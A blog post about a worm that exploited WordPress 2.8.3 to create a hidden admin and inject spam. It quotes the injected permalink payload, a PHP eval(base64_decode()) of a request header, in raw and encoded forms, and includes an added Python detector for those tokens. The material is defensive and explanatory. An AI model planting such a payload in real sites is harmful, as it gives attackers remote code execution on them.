
WordPress Worm Epidemic
A month ago, a new critical vulnerability in WordPress 2.8.3 came to light that makes it easy to change the administrator password remotely. WordPress 2.8.4 was released immediately to fix this vulnerability. As it turned out, not all bloggers keep up with updates.
This weekend, a real epidemic of a new virus broke out, hitting blogs running WordPress 2.8.3 and earlier versions in the 2.8 branch. The worm logs on to a blog, launches malicious code through the permalink structure and makes itself a second admin, then runs a script to erase itself from the users page and begins quietly adding spam and links to malicious content to archived posts.
The pest is quite difficult to detect right away, especially if it has not published anything yet. To find it, check the permalinks and the RSS feed for the following code:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or for errors such as
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’
If such code is present or the feed is broken, the blog is infected.
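The check described above can be scripted. The following Python sketch is an added example, not code from the original post or from WordPress: it looks for the tokens common to both quoted strings in a permalink structure or feed link, percent-decoding first, and treats a feed that no longer parses as a symptom. The function names, the sample feeds and the blog.example host are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Tokens shared by both indicator strings quoted in the post.
INDICATORS = [re.compile(p, re.I) for p in
              (r"eval\s*\(", r"base64_decode\s*\(", r"\$_SERVER\s*\[")]

# The two indicator strings as quoted in the post (inert text here).
RAW_FORM = "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
ENC_FORM = "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%"

def indicator_hits(value, rounds=3):
    """Return indicator patterns found in a permalink structure or URL.

    Percent-decoding is repeated so the %7B/%5B form matches like the raw one.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return [p.pattern for p in INDICATORS if p.search(value)]

def check_feed(feed_xml):
    """Return findings for an RSS feed body; an empty list means no symptom."""
    try:
        root = ET.fromstring(feed_xml)
    except ET.ParseError as exc:
        # A bare "&" from the injected string makes the feed ill-formed XML,
        # which is the broken-feed symptom the post describes.
        findings = [f"feed does not parse: {exc}"]
        if indicator_hits(feed_xml):
            findings.append("indicator tokens in raw feed text")
        return findings
    return [f"<{el.tag}> contains {indicator_hits(el.text)}"
            for el in root.iter()
            if el.tag in ("link", "guid", "comments") and el.text
            and indicator_hits(el.text)]

# Constructed sample feeds (blog.example is a placeholder host).
def make_feed(link):
    return f"<rss><channel><item><link>{link}</link></item></channel></rss>"

CLEAN_FEED = make_feed("http://blog.example/2009/09/hello-world/")
BROKEN_FEED = make_feed("http://blog.example/2009/09/hello-world/" + RAW_FORM)
ESCAPED_FEED = make_feed("http://blog.example/x" + ENC_FORM.replace("&", "&amp;"))

if __name__ == "__main__":
    for name in ("CLEAN_FEED", "BROKEN_FEED", "ESCAPED_FEED"):
        print(name, check_feed(globals()[name]))
```

Run `indicator_hits` on the permalink structure value saved in the blog's settings as well, since the feed may still look normal before the worm has published anything.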
Removing the worm is a non-trivial task.
By the way, Matt Mullenweg has written a great article on security, in which he urges users to keep watching for and installing new updates; here are instructions for upgrading WordPress. This is the only way to protect yourself from this and future epidemics.